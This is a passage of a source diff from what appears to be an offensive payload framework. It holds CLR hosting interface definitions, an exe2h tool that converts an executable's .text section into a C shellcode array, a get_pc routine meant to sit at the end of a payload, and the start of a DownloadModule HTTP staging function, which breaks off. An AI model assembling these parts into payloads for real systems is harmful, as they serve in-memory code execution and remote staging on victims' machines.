573 /* [retval][out] */ IEnumUnknown **ppEnumerator);
574
575 HRESULT ( STDMETHODCALLTYPE *EnumerateLoadedRuntimes )(
576 ICLRMetaHost * This,
577 /* [in] */ HANDLE hndProcess,
578 /* [retval][out] */ IEnumUnknown **ppEnumerator);
579
580 HRESULT ( STDMETHODCALLTYPE *RequestRuntimeLoadedNotification )(
581 ICLRMetaHost * This,
582 /* [in] */ RuntimeLoadedCallbackFnPtr pCallbackFunction);
583
584 HRESULT ( STDMETHODCALLTYPE *QueryLegacyV2RuntimeBinding )(
585 ICLRMetaHost * This,
586 /* [in] */ REFIID riid,
587 /* [retval][iid_is][out] */ LPVOID *ppUnk);
588
589 HRESULT ( STDMETHODCALLTYPE *ExitProcess )(
590 ICLRMetaHost * This,
591 /* [in] */ INT32 iExitCode);
592
593 END_INTERFACE
594 } ICLRMetaHostVtbl;
595
596 typedef struct _ICLRMetaHost
597 {
598 ICLRMetaHostVtbl *lpVtbl;
599 } ICLRMetaHost;
600
601 typedef struct ICorRuntimeHostVtbl
602 {
603 BEGIN_INTERFACE
604
605 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
606 ICorRuntimeHost * This,
607 /* [in] */ REFIID riid,
608 /* [iid_is][out] */
609 __RPC__deref_out void **ppvObject);
610
611 ULONG ( STDMETHODCALLTYPE *AddRef )(
612 ICorRuntimeHost * This);
613
614 ULONG ( STDMETHODCALLTYPE *Release )(
615 ICorRuntimeHost * This);
616
617 HRESULT ( STDMETHODCALLTYPE *CreateLogicalThreadState )(
618 ICorRuntimeHost * This);
619
620 HRESULT ( STDMETHODCALLTYPE *DeleteLogicalThreadState )(
621 ICorRuntimeHost * This);
622
623 HRESULT ( STDMETHODCALLTYPE *SwitchInLogicalThreadState )(
624 ICorRuntimeHost * This,
625 /* [in] */ DWORD *pFiberCookie);
626
627 HRESULT ( STDMETHODCALLTYPE *SwitchOutLogicalThreadState )(
628 ICorRuntimeHost * This,
629 /* [out] */ DWORD **pFiberCookie);
630
631 HRESULT ( STDMETHODCALLTYPE *LocksHeldByLogicalThread )(
632 ICorRuntimeHost * This,
633 /* [out] */ DWORD *pCount);
634
635 HRESULT ( STDMETHODCALLTYPE *MapFile )(
636 ICorRuntimeHost * This,
637 /* [in] */ HANDLE hFile,
638 /* [out] */ HMODULE *hMapAddress);
639
640 HRESULT ( STDMETHODCALLTYPE *GetConfiguration )(
641 ICorRuntimeHost * This,
642 /* [out] */ ICorConfiguration **pConfiguration);
643
644 HRESULT ( STDMETHODCALLTYPE *Start )(
645 ICorRuntimeHost * This);
646
647 HRESULT ( STDMETHODCALLTYPE *Stop )(
648 ICorRuntimeHost * This);
649
650 HRESULT ( STDMETHODCALLTYPE *CreateDomain )(
651 ICorRuntimeHost * This,
652 /* [in] */ LPCWSTR pwzFriendlyName,
653 /* [in] */ IUnknown *pIdentityArray,
654 /* [out] */ IUnknown **pAppDomain);
655
656 HRESULT ( STDMETHODCALLTYPE *GetDefaultDomain )(
657 ICorRuntimeHost * This,
658 /* [out] */ IUnknown **pAppDomain);
659
660 HRESULT ( STDMETHODCALLTYPE *EnumDomains )(
661 ICorRuntimeHost * This,
662 /* [out] */ HDOMAINENUM *hEnum);
663
664 HRESULT ( STDMETHODCALLTYPE *NextDomain )(
665 ICorRuntimeHost * This,
666 /* [in] */ HDOMAINENUM hEnum,
667 /* [out] */ IUnknown **pAppDomain);
668
669 HRESULT ( STDMETHODCALLTYPE *CloseEnum )(
670 ICorRuntimeHost * This,
671 /* [in] */ HDOMAINENUM hEnum);
672
673 HRESULT ( STDMETHODCALLTYPE *CreateDomainEx )(
674 ICorRuntimeHost * This,
675 /* [in] */ LPCWSTR pwzFriendlyName,
676 /* [in] */ IUnknown *pSetup,
677 /* [in] */ IUnknown *pEvidence,
678 /* [out] */ IUnknown **pAppDomain);
679
680 HRESULT ( STDMETHODCALLTYPE *CreateDomainSetup )(
681 ICorRuntimeHost * This,
682 /* [out] */ IUnknown **pAppDomainSetup);
683
684 HRESULT ( STDMETHODCALLTYPE *CreateEvidence )(
685 ICorRuntimeHost * This,
686 /* [out] */ IUnknown **pEvidence);
687
688 HRESULT ( STDMETHODCALLTYPE *UnloadDomain )(
689 ICorRuntimeHost * This,
690 /* [in] */ IUnknown *pAppDomain);
691
692 HRESULT ( STDMETHODCALLTYPE *CurrentDomain )(
693 ICorRuntimeHost * This,
694 /* [out] */ IUnknown **pAppDomain);
695
696 END_INTERFACE
697 } ICorRuntimeHostVtbl;
698
699 typedef struct _ICorRuntimeHost {
700 ICorRuntimeHostVtbl *lpVtbl;
701 } ICorRuntimeHost;
702
703 #undef DUMMY_METHOD
704 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IMethodInfo *This)
705
706 typedef struct _MethodInfoVtbl {
707 BEGIN_INTERFACE
708
709 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
710 IMethodInfo *This,
711 /* [in] */ REFIID riid,
712 /* [iid_is][out] */
713 __RPC__deref_out void **ppvObject);
714
715 ULONG ( STDMETHODCALLTYPE *AddRef )(
716 IMethodInfo *This);
717
718 ULONG ( STDMETHODCALLTYPE *Release )(
719 IMethodInfo *This);
720
721 DUMMY_METHOD(GetTypeInfoCount);
722 DUMMY_METHOD(GetTypeInfo);
723 DUMMY_METHOD(GetIDsOfNames);
724 DUMMY_METHOD(Invoke);
725
726 DUMMY_METHOD(ToString);
727 DUMMY_METHOD(Equals);
728 DUMMY_METHOD(GetHashCode);
729 DUMMY_METHOD(GetType);
730 DUMMY_METHOD(MemberType);
731 DUMMY_METHOD(name);
732 DUMMY_METHOD(DeclaringType);
733 DUMMY_METHOD(ReflectedType);
734 DUMMY_METHOD(GetCustomAttributes);
735 DUMMY_METHOD(GetCustomAttributes_2);
736 DUMMY_METHOD(IsDefined);
737
738 HRESULT ( STDMETHODCALLTYPE *GetParameters)(
739 IMethodInfo *This,
740 SAFEARRAY **pRetVal);
741
742 DUMMY_METHOD(GetMethodImplementationFlags);
743 DUMMY_METHOD(MethodHandle);
744 DUMMY_METHOD(Attributes);
745 DUMMY_METHOD(CallingConvention);
746 DUMMY_METHOD(Invoke_2);
747 DUMMY_METHOD(IsPublic);
748 DUMMY_METHOD(IsPrivate);
749 DUMMY_METHOD(IsFamily);
750 DUMMY_METHOD(IsAssembly);
751 DUMMY_METHOD(IsFamilyAndAssembly);
752 DUMMY_METHOD(IsFamilyOrAssembly);
753 DUMMY_METHOD(IsStatic);
754 DUMMY_METHOD(IsFinal);
755 DUMMY_METHOD(IsVirtual);
756 DUMMY_METHOD(IsHideBySig);
757 DUMMY_METHOD(IsAbstract);
758 DUMMY_METHOD(IsSpecialName);
759 DUMMY_METHOD(IsConstructor);
760
761 HRESULT ( STDMETHODCALLTYPE *Invoke_3 )(
762 IMethodInfo *This,
763 VARIANT obj,
764 SAFEARRAY *parameters,
765 VARIANT *ret);
766
767 DUMMY_METHOD(returnType);
768 DUMMY_METHOD(ReturnTypeCustomAttributes);
769 DUMMY_METHOD(GetBaseDefinition);
770
771 END_INTERFACE
772 } MethodInfoVtbl;
773
774 typedef struct _MethodInfo {
775 MethodInfoVtbl *lpVtbl;
776 } MethodInfo;
777
778 typedef struct ICorConfigurationVtbl
779 {
780 BEGIN_INTERFACE
781
782 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
783 ICorConfiguration * This,
784 /* [in] */ REFIID riid,
785 /* [iid_is][out] */
786 __RPC__deref_out void **ppvObject);
787
788 ULONG ( STDMETHODCALLTYPE *AddRef )(
789 ICorConfiguration * This);
790
791 ULONG ( STDMETHODCALLTYPE *Release )(
792 ICorConfiguration * This);
793
794 HRESULT ( STDMETHODCALLTYPE *SetGCThreadControl )(
795 ICorConfiguration * This,
796 /* [in] */ IGCThreadControl *pGCThreadControl);
797
798 HRESULT ( STDMETHODCALLTYPE *SetGCHostControl )(
799 ICorConfiguration * This,
800 /* [in] */ IGCHostControl *pGCHostControl);
801
802 HRESULT ( STDMETHODCALLTYPE *SetDebuggerThreadControl )(
803 ICorConfiguration * This,
804 /* [in] */ IDebuggerThreadControl *pDebuggerThreadControl);
805
806 HRESULT ( STDMETHODCALLTYPE *AddDebuggerSpecialThread )(
807 ICorConfiguration * This,
808 /* [in] */ DWORD dwSpecialThreadId);
809
810 END_INTERFACE
811 } ICorConfigurationVtbl;
812
813 typedef struct _ICorConfiguration
814 {
815 ICorConfigurationVtbl *lpVtbl;
816 }ICorConfiguration;
817
818 typedef struct IGCThreadControlVtbl
819 {
820 BEGIN_INTERFACE
821
822 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
823 IGCThreadControl * This,
824 /* [in] */ REFIID riid,
825 /* [iid_is][out] */
826 __RPC__deref_out void **ppvObject);
827
828 ULONG ( STDMETHODCALLTYPE *AddRef )(
829 IGCThreadControl * This);
830
831 ULONG ( STDMETHODCALLTYPE *Release )(
832 IGCThreadControl * This);
833
834 HRESULT ( STDMETHODCALLTYPE *ThreadIsBlockingForSuspension )(
835 IGCThreadControl * This);
836
837 HRESULT ( STDMETHODCALLTYPE *SuspensionStarting )(
838 IGCThreadControl * This);
839
840 HRESULT ( STDMETHODCALLTYPE *SuspensionEnding )(
841 IGCThreadControl * This,
842 DWORD Generation);
843
844 END_INTERFACE
845 } IGCThreadControlVtbl;
846
847 typedef struct _IGCThreadControl
848 {
849 IGCThreadControlVtbl *lpVtbl;
850 }IGCThreadControl;
851
852 typedef struct IGCHostControlVtbl
853 {
854 BEGIN_INTERFACE
855
856 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
857 IGCHostControl * This,
858 /* [in] */ REFIID riid,
859 /* [iid_is][out] */
860 __RPC__deref_out void **ppvObject);
861
862 ULONG ( STDMETHODCALLTYPE *AddRef )(
863 IGCHostControl * This);
864
865 ULONG ( STDMETHODCALLTYPE *Release )(
866 IGCHostControl * This);
867
868 HRESULT ( STDMETHODCALLTYPE *RequestVirtualMemLimit )(
869 IGCHostControl * This,
870 /* [in] */ SIZE_T sztMaxVirtualMemMB,
871 /* [out][in] */ SIZE_T *psztNewMaxVirtualMemMB);
872
873 END_INTERFACE
874 } IGCHostControlVtbl;
875
876 typedef struct _IGCHostControl
877 {
878 IGCHostControlVtbl *lpVtbl;
879 } IGCHostControl;
880
881 typedef struct IDebuggerThreadControlVtbl
882 {
883 BEGIN_INTERFACE
884
885 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
886 IDebuggerThreadControl * This,
887 /* [in] */ REFIID riid,
888 /* [iid_is][out] */
889 __RPC__deref_out void **ppvObject);
890
891 ULONG ( STDMETHODCALLTYPE *AddRef )(
892 IDebuggerThreadControl * This);
893
894 ULONG ( STDMETHODCALLTYPE *Release )(
895 IDebuggerThreadControl * This);
896
897 HRESULT ( STDMETHODCALLTYPE *ThreadIsBlockingForDebugger)(
898 IDebuggerThreadControl * This);
899
900 HRESULT ( STDMETHODCALLTYPE *ReleaseAllRuntimeThreads)(
901 IDebuggerThreadControl * This);
902
903 HRESULT ( STDMETHODCALLTYPE *StartBlockingForDebugger)(
904 IDebuggerThreadControl * This,
905 DWORD dwUnused);
906
907 END_INTERFACE
908 } IDebuggerThreadControlVtbl;
909
910 typedef struct _IDebuggerThreadControl {
911 IDebuggerThreadControlVtbl *lpVtbl;
912 } IDebuggerThreadControl;
913
914 #endif
915
+4
-0
payload/exe2h/Makefile less more
0 exe2h:
1 gcc -I ../../include -Wall exe2h.c -oexe2h
2 clean:
3 rm *.o exe2h
+4
-0
payload/exe2h/Makefile.mingw less more
0 exe2h:
1 x86_64-w64-mingw32-gcc exe2h.c mmap-windows.c -lshlwapi -oexe2h.exe
2 clean:
3 rm exe2h.exe *.o
+4
-0
payload/exe2h/Makefile.msvc less more
0 exe2h:
1 cl exe2h.c mmap-windows.c
2 clean:
3 del exe2h.obj mmap-windows.obj exe2h.exe
+319
-0
payload/exe2h/exe2h.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include <stdio.h>
32 #include <string.h>
33 #include <stdlib.h>
34 #include <stdint.h>
35 #include <ctype.h>
36
37 #include <fcntl.h>
38 #include <errno.h>
39 #include <sys/types.h>
40 #include <sys/stat.h>
41
42 #if defined(_WIN32) || defined(_WIN64)
43 #define WINDOWS
44 #include <windows.h>
45 #include <shlwapi.h>
46 #include "mmap.h"
47 #pragma comment(lib, "shlwapi.lib")
48 #else
49 #define NIX
50 #include <libgen.h>
51 #include <sys/mman.h>
52 #include <unistd.h>
53 #include <pe.h>
54 #endif
55
56 // return pointer to DOS header
57 PIMAGE_DOS_HEADER DosHdr(void *map) {
58 return (PIMAGE_DOS_HEADER)map;
59 }
60
61 // return pointer to NT header
62 PIMAGE_NT_HEADERS NtHdr (void *map) {
63 return (PIMAGE_NT_HEADERS) ((uint8_t*)map + DosHdr(map)->e_lfanew);
64 }
65
66 // return pointer to File header
67 PIMAGE_FILE_HEADER FileHdr (void *map) {
68 return &NtHdr(map)->FileHeader;
69 }
70
71 // determines CPU architecture of binary
72 int is32 (void *map) {
73 return FileHdr(map)->Machine == IMAGE_FILE_MACHINE_I386;
74 }
75
76 // determines CPU architecture of binary
77 int is64 (void *map) {
78 return FileHdr(map)->Machine == IMAGE_FILE_MACHINE_AMD64;
79 }
80
81 // return pointer to Optional header
82 void* OptHdr (void *map) {
83 return (void*)&NtHdr(map)->OptionalHeader;
84 }
85
86 // return pointer to first section header
87 PIMAGE_SECTION_HEADER SecHdr (void *map) {
88 PIMAGE_NT_HEADERS nt = NtHdr(map);
89
90 return (PIMAGE_SECTION_HEADER)((uint8_t*)&nt->OptionalHeader +
91 nt->FileHeader.SizeOfOptionalHeader);
92 }
93
94 uint32_t DirSize (void *map) {
95 if (is32(map)) {
96 return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->NumberOfRvaAndSizes;
97 } else {
98 return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->NumberOfRvaAndSizes;
99 }
100 }
101
102 uint32_t SecSize (void *map) {
103 return NtHdr(map)->FileHeader.NumberOfSections;
104 }
105
106 PIMAGE_DATA_DIRECTORY Dirs (void *map) {
107 if (is32(map)) {
108 return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->DataDirectory;
109 } else {
110 return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->DataDirectory;
111 }
112 }
113
114 uint64_t ImgBase (void *map) {
115 if (is32(map)) {
116 return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->ImageBase;
117 } else {
118 return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->ImageBase;
119 }
120 }
121
122 // valid dos header?
123 int valid_dos_hdr (void *map) {
124 PIMAGE_DOS_HEADER dos = DosHdr(map);
125
126 if (dos->e_magic != IMAGE_DOS_SIGNATURE) return 0;
127 return (dos->e_lfanew != 0);
128 }
129
130 // valid nt headers
131 int valid_nt_hdr (void *map) {
132 return NtHdr(map)->Signature == IMAGE_NT_SIGNATURE;
133 }
134
135 uint32_t rva2ofs (void *map, uint32_t rva) {
136 int i;
137
138 PIMAGE_SECTION_HEADER sh = SecHdr(map);
139
140 for (i=0; i<SecSize(map); i++) {
141 if (rva >= sh[i].VirtualAddress && rva < sh[i].VirtualAddress + sh[i].SizeOfRawData)
142 return sh[i].PointerToRawData + (rva - sh[i].VirtualAddress);
143 }
144 return -1;
145 }
146
147 void bin2h(void *map, char *fname, void *bin, uint32_t len) {
148 char label[32], file[32], *str;
149 uint32_t i;
150 uint8_t *p=(uint8_t*)bin;
151 FILE *fd;
152
153 memset(label, 0, sizeof(label));
154 memset(file, 0, sizeof(file));
155
156 #if defined(WINDOWS)
157 str = PathFindFileName(fname);
158 #else
159 str = basename(fname);
160 #endif
161 for(i=0; str[i] != 0 && i < 16;i++) {
162 if(str[i] == '.') {
163 file[i] = label[i] = '_';
164 } else {
165 label[i] = toupper(str[i]);
166 file[i] = tolower(str[i]);
167 }
168 }
169 if(map != NULL) {
170 strcat(label, is32(map) ? "_X86" : "_X64");
171 strcat(file, is32(map) ? "_x86" : "_x64");
172 }
173 strcat(file, ".h");
174
175 fd = fopen(file, "wb");
176
177 if(fd != NULL) {
178 fprintf(fd, "\nunsigned char %s[] = {", label);
179
180 for(i=0;i<len;i++) {
181 if(!(i % 12)) fprintf(fd, "\n ");
182 fprintf(fd, "0x%02x", p[i]);
183 if((i+1) != len) fprintf(fd, ", ");
184 }
185 fprintf(fd, "};\n\n");
186 fclose(fd);
187 printf(" [ saved code to %s\n", file);
188 } else printf(" [ unable to create file : %s\n", file);
189 }
190
191 /**
192 void bin2array(void *map, char *fname, void *bin, uint32_t len) {
193 char label[32], file[32], *str;
194 uint32_t i;
195 uint32_t *p=(uint32_t*)bin;
196 FILE *fd;
197
198 memset(label, 0, sizeof(label));
199 memset(file, 0, sizeof(file));
200
201 #if defined(WINDOWS)
202 str = PathFindFileName(fname);
203 #else
204 str = basename(fname);
205 #endif
206 for(i=0; str[i] != 0 && i < 16;i++) {
207 if(str[i] == '.') {
208 file[i] = label[i] = '_';
209 } else {
210 label[i] = toupper(str[i]);
211 file[i] = tolower(str[i]);
212 }
213 }
214
215 strcat(file, ".h");
216
217 fd = fopen(file, "wb");
218
219 if(fd != NULL) {
220 // align up by 4
221 len = (len & -4) + 4;
222 len >>= 2;
223
224 // declare the array
225 fprintf(fd, "\nunsigned int %s[%i];\n\n", label, len);
226
227 // initialize array
228 for(i=0; i<len; i++) {
229 fprintf(fd, "%s[%i] = 0x%08" PRIX32 ";\n", label, i, p[i]);
230 }
231 fclose(fd);
232 printf(" [ Saved array to %s\n", file);
233 } else printf(" [ unable to create file : %s\n", file);
234 }
235 */
236 // structure of COFF (.obj) file
237
238 //--------------------------//
239 // IMAGE_FILE_HEADER //
240 //--------------------------//
241 // IMAGE_SECTION_HEADER //
242 // * num sections //
243 //--------------------------//
244 // //
245 // //
246 // //
247 // section data //
248 // * num sections //
249 // //
250 // //
251 //--------------------------//
252 // IMAGE_SYMBOL //
253 // * num symbols //
254 //--------------------------//
255 // string table //
256 //--------------------------//
257
258 int main (int argc, char *argv[]) {
259 int fd, i;
260 struct stat fs;
261 uint8_t *map, *cs;
262 PIMAGE_SECTION_HEADER sh;
263 //PIMAGE_FILE_HEADER fh;
264 //PIMAGE_COFF_SYMBOLS_HEADER csh;
265 uint32_t ofs, len;
266
267 if (argc != 2) {
268 printf ("\n [ usage: file2h <file.exe | file.bin>\n");
269 return 0;
270 }
271
272 // open file for reading
273 fd = open(argv[1], O_RDONLY);
274
275 if(fd == 0) {
276 printf(" [ unable to open %s\n", argv[1]);
277 return 0;
278 }
279 // if file has some data
280 if(fstat(fd, &fs) == 0) {
281 // map into memory
282 map = (uint8_t*)mmap(NULL, fs.st_size,
283 PROT_READ, MAP_PRIVATE, fd, 0);
284 if(map != NULL) {
285 if(valid_dos_hdr(map) && valid_nt_hdr(map)) {
286 printf(" [ Found valid DOS and NT header.\n");
287 // get the .text section
288 sh = SecHdr(map);
289 // if a section header was returned
290 if(sh != NULL) {
291 printf(" [ Locating .text section.\n");
292 // locate the .text section
293 for(i=0; i<SecSize(map); i++) {
294 if(strcmp((char*)sh[i].Name, ".text") == 0) {
295 ofs = rva2ofs(map, sh[i].VirtualAddress);
296
297 if(ofs != -1) {
298 cs = (map + ofs);
299 len = sh[i].Misc.VirtualSize;
300 // convert to header file
301 bin2h(map, argv[1], cs, len);
302 break;
303 }
304 }
305 }
306 }
307 } else {
308 printf(" [ No valid DOS or NT header found.\n");
309 // treat file as binary
310 bin2h(NULL, argv[1], map, fs.st_size);
311 //bin2array(NULL, argv[1], map, fs.st_size);
312 }
313 munmap(map, fs.st_size);
314 }
315 }
316 close(fd);
317 return 0;
318 }
payload/exe2h/exe2h.obj less more
Binary diff not shown
+74
-0
payload/exe2h/mmap-windows.c less more
0 /* mmap() replacement for Windows
1 *
2 * Author: Mike Frysinger <[email protected]>
3 * Placed into the public domain
4 */
5
6 /* References:
7 * CreateFileMapping: http://msdn.microsoft.com/en-us/library/aa366537(VS.85).aspx
8 * CloseHandle: http://msdn.microsoft.com/en-us/library/ms724211(VS.85).aspx
9 * MapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366761(VS.85).aspx
10 * UnmapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366882(VS.85).aspx
11 */
12
13 #include "mmap.h"
14
15 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset)
16 {
17 if (prot & ~(PROT_READ | PROT_WRITE | PROT_EXEC))
18 return MAP_FAILED;
19 if (fd == -1) {
20 if (!(flags & MAP_ANON) || offset)
21 return MAP_FAILED;
22 } else if (flags & MAP_ANON)
23 return MAP_FAILED;
24
25 DWORD flProtect;
26 if (prot & PROT_WRITE) {
27 if (prot & PROT_EXEC)
28 flProtect = PAGE_EXECUTE_READWRITE;
29 else
30 flProtect = PAGE_READWRITE;
31 } else if (prot & PROT_EXEC) {
32 if (prot & PROT_READ)
33 flProtect = PAGE_EXECUTE_READ;
34 else if (prot & PROT_EXEC)
35 flProtect = PAGE_EXECUTE;
36 } else
37 flProtect = PAGE_READONLY;
38
39 off_t end = length + offset;
40 HANDLE mmap_fd, h;
41 if (fd == -1)
42 mmap_fd = INVALID_HANDLE_VALUE;
43 else
44 mmap_fd = (HANDLE)_get_osfhandle(fd);
45 h = CreateFileMapping(mmap_fd, NULL, flProtect, DWORD_HI(end), DWORD_LO(end), NULL);
46 if (h == NULL)
47 return MAP_FAILED;
48
49 DWORD dwDesiredAccess;
50 if (prot & PROT_WRITE)
51 dwDesiredAccess = FILE_MAP_WRITE;
52 else
53 dwDesiredAccess = FILE_MAP_READ;
54 if (prot & PROT_EXEC)
55 dwDesiredAccess |= FILE_MAP_EXECUTE;
56 if (flags & MAP_PRIVATE)
57 dwDesiredAccess |= FILE_MAP_COPY;
58 void *ret = MapViewOfFile(h, dwDesiredAccess, DWORD_HI(offset), DWORD_LO(offset), length);
59 if (ret == NULL) {
60 CloseHandle(h);
61 ret = MAP_FAILED;
62 }
63 return ret;
64 }
65
66 void munmap(void *addr, size_t length)
67 {
68 UnmapViewOfFile(addr);
69 /* ruh-ro, we leaked handle from CreateFileMapping() ... */
70 }
71
72 #undef DWORD_HI
73 #undef DWORD_LO
payload/exe2h/mmap-windows.obj less more
Binary diff not shown
+45
-0
payload/exe2h/mmap.h less more
0
1
2 #ifndef MMAP_H
3 #define MMAP_H
4
5 #include <io.h>
6 #include <windows.h>
7 #include <sys/types.h>
8
9 #define PROT_READ 0x1
10 #define PROT_WRITE 0x2
11 /* This flag is only available in WinXP+ */
12 #ifdef FILE_MAP_EXECUTE
13 #define PROT_EXEC 0x4
14 #else
15 #define PROT_EXEC 0x0
16 #define FILE_MAP_EXECUTE 0
17 #endif
18
19 #define MAP_SHARED 0x01
20 #define MAP_PRIVATE 0x02
21 #define MAP_ANONYMOUS 0x20
22 #define MAP_ANON MAP_ANONYMOUS
23 #define MAP_FAILED ((void *) -1)
24
25 #ifdef __USE_FILE_OFFSET64
26 # define DWORD_HI(x) (x >> 32)
27 # define DWORD_LO(x) ((x) & 0xffffffff)
28 #else
29 # define DWORD_HI(x) (0)
30 # define DWORD_LO(x) (x)
31 #endif
32
33 #ifdef __cplusplus
34 extern "C" {
35 #endif
36
37 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset);
38 void munmap(void *addr, size_t length);
39
40 #ifdef __cplusplus
41 }
42 #endif
43
44 #endif
+61
-0
payload/getpc.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 // Function to return the program counter.
32 // Always place this at the end of payload.
33 // Tested with x86 build of MSVC 2019 and MinGW. YMMV.
34 #if defined(_MSC_VER)
35 #if defined(_M_IX86)
36 __declspec(naked) char *get_pc(void) {
37 __asm {
38 call pc_addr
39 pc_addr:
40 pop eax
41 sub eax, 5
42 ret
43 }
44 }
45 #endif
46 #elif defined(__GNUC__)
47 #if defined(__i386__)
48 asm (
49 ".global get_pc\n"
50 ".global _get_pc\n"
51 "_get_pc:\n"
52 "get_pc:\n"
53 " call pc_addr\n"
54 "pc_addr:\n"
55 " pop %eax\n"
56 " sub $5, %eax\n"
57 " ret\n"
58 );
59 #endif
60 #endif
+198
-0
payload/http_client.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 BOOL DownloadModule(PDONUT_INSTANCE inst) {
32 HINTERNET hin, con, req;
33 PBYTE buf;
34 DWORD s, n, rd, len, code=0;
35 BOOL bResult = FALSE, bSecure = FALSE;
36 URL_COMPONENTS uc;
37 CHAR host[DONUT_MAX_URL],
38 file[DONUT_MAX_URL];
39
40 // default flags for HTTP client
41 DWORD flags = INTERNET_FLAG_KEEP_CONNECTION |
42 INTERNET_FLAG_NO_CACHE_WRITE |
43 INTERNET_FLAG_NO_UI |
44 INTERNET_FLAG_RELOAD |
45 INTERNET_FLAG_NO_AUTO_REDIRECT;
46
47 Memset(&uc, 0, sizeof(uc));
48
49 uc.dwStructSize = sizeof(uc);
